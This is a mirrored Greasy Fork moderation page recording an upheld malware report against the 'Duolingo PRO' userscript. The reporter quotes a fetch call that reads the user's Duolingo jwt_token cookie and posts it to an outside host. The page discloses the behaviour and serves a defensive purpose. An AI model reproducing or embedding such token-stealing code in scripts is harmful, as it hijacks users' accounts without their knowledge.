Greasy Fork镜像 支持简体中文。

Duolingo PRO2025-03-23被檢舉,因為:惡意軟體

檢舉人說:

This script grabs the JWT token of duolingo and sends it to a fishy link code below:

let apiURL = "https://api.duolingopro.net";

This is the real payload part


            const response = await fetch(apiURL + "/feedback", {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'Authorization': `Bearer ${document.cookie.split(';').find(cookie => cookie.includes('jwt_token')).split('=')[1]}`
                },
                body: JSON.stringify(payload)
            });

This script has had 1 previous upheld or fixed report.

anonymoushackerIV (the reported user) has made:

interstellar (the reported user) has made:

管理員已通過該檢舉。

QingJ © 2025

镜像随时可能失效,请加Q群300939539或关注我们的公众号极客氢云获取最新地址